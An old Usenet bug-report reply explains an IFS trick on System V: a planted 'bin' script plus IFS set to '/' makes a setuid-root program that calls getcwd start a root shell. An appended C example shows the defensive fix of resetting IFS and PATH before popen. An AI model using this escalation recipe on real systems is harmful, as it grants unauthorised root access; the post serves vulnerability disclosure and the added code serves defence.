Path: utzoo!mnetor!uunet!mcvax!unido!cosmo!jum
From: jum@cosmo.UUCP (Uwe Mager)
Newsgroups: comp.bugs.sys5
Subject: Re: A security hole
Message-ID: <892@cosmo.UUCP>
Date: 11 Mar 88 01:30:22 GMT
References: <181@wsccs.UUCP> <722@rivm05.UUCP> <478@minya.UUCP>
Reply-To: jum@cosmo.UUCP (Jens-Uwe Mager(sysop))
Organization: CosmoNet Kommunikationssysteme GmbH, D-300 Hannover, West Germany
Lines: 23

In article <478@minya.UUCP> jc@minya.UUCP (John Chambers) writes:
...
>
>Anyhow, what can one do with getcwd() or popen() within a setuid program
>(root or otherwise) that isn't a consequence of the search path? If there
>is a real security hole here, I'd be very interested in reading about it.

There is a nice hack to make the sh misunderstand the path variable.
For example the following will work on most SYSV machines:

in file named ``bin'' in your cwd:

	IFS=" \t\n"		# escapes for readability
	/bin/sh /dev/tty 2>&1
	pwd

and now from a command line:

	IFS="/"; export IFS
	at now + 1 minute	# or any setuid root containing getcwd

This will not work with the Korn shell; there is a special check for IFS.
--
Jens-Uwe Mager jum@focus.UUCP || jum@cosmo.UUCP
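Added example, not part of the post above and not code from any of the systems it mentions: the defensive counterpart to the IFS problem, in C, for a setuid program that still has to start a shell through popen() or system(). The helper names ifs_is_safe(), sanitize_subshell_env() and safe_popen_pwd() and the PATH value "/bin:/usr/bin" are this example's own choices; the IFS check only models the kind of check the post attributes to the Korn shell and makes no claim about ksh's actual code.

```c
/* Hardening the environment a setuid program hands to a child shell.
 * The post shows that an inherited IFS of "/" makes sh split "/bin/pwd"
 * into the words "bin" and "pwd", so the defence is to put IFS and PATH
 * back to known values before popen()/system() starts the child.
 * All helper names and the safe PATH below are this example's own. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SAFE_PATH "/bin:/usr/bin"   /* assumed safe search path */

/* IFS is acceptable only when it holds nothing but blank, tab and newline;
 * any other byte ('/', ':', ...) would turn path components into words.
 * An unset IFS is treated as safe because sh then uses its built-in default. */
int ifs_is_safe(const char *ifs)
{
    if (ifs == NULL)
        return 1;
    for (; *ifs != '\0'; ifs++)
        if (*ifs != ' ' && *ifs != '\t' && *ifs != '\n')
            return 0;
    return 1;
}

/* Reset the variables that decide how a child sh interprets a command line.
 * Returns 0 on success, -1 if the environment could not be changed. */
int sanitize_subshell_env(void)
{
    if (setenv("IFS", " \t\n", 1) != 0)
        return -1;
    if (setenv("PATH", SAFE_PATH, 1) != 0)
        return -1;
    return 0;
}

/* Run /bin/pwd through popen() the way an old getcwd() did, but only after
 * the environment has been sanitized. Writes the trimmed result into buf and
 * returns buf, or NULL on failure. */
char *safe_popen_pwd(char *buf, size_t len)
{
    FILE *fp;
    size_t n;

    if (sanitize_subshell_env() != 0)
        return NULL;
    fp = popen("/bin/pwd", "r");
    if (fp == NULL)
        return NULL;
    if (fgets(buf, (int)len, fp) == NULL) {
        pclose(fp);
        return NULL;
    }
    pclose(fp);
    n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n')
        buf[n - 1] = '\0';
    return buf;
}

int main(void)
{
    char cwd[1024];

    /* Constructed hostile environment, standing in for the attacker's export. */
    setenv("IFS", "/", 1);
    printf("inherited IFS is %s\n",
           ifs_is_safe(getenv("IFS")) ? "safe" : "unsafe");

    if (safe_popen_pwd(cwd, sizeof cwd) != NULL)
        printf("pwd via sanitized subshell: %s\n", cwd);

    printf("IFS after sanitizing is %s\n",
           ifs_is_safe(getenv("IFS")) ? "safe" : "unsafe");
    return 0;
}
```

Compile with cc and run: the program first sets IFS to "/" to stand in for the exported value from the post, reports it as unsafe, then shows that the reset restores blank/tab/newline before /bin/pwd is handed to the child shell. Where the C library offers a getcwd() that walks the directory tree itself and never starts a shell, that is the better fix; this example covers the case where a subshell cannot be avoided.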